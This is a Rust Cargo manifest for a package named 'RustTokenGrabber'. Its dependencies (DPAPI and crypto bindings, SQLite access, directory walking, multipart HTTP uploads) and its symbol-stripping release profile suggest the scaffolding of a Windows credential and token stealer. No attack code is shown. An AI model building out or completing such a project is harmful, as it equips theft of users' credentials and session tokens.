[package]
name = "RustTokenGrabber"
version = "0.1.0"
edition = "2021"

[dependencies]
aes-gcm = "0.10.3"
base64 = "0.22.1"
csv = "1.3.0"
dirs = "5.0.1"
once_cell = "1.19.0"
regex = "1.10.5"
reqwest = { version = "0.12.5", features = ["blocking", "multipart", "json"] }
rusqlite = { version = "0.31", features = ["bundled"] }
serde = "1.0.203"
serde_json = "1.0.117"
serde_derive = "1.0"
walkdir = "2.5.0"
winapi = { version = "0.3.9", features = ["wincrypt", "dpapi", "winbase", "wtypesbase"] }

[profile.release]
lto = true
codegen-units = 1
opt-level = 3
panic = "abort"
incremental = true
debug = "none"
strip = "symbols"
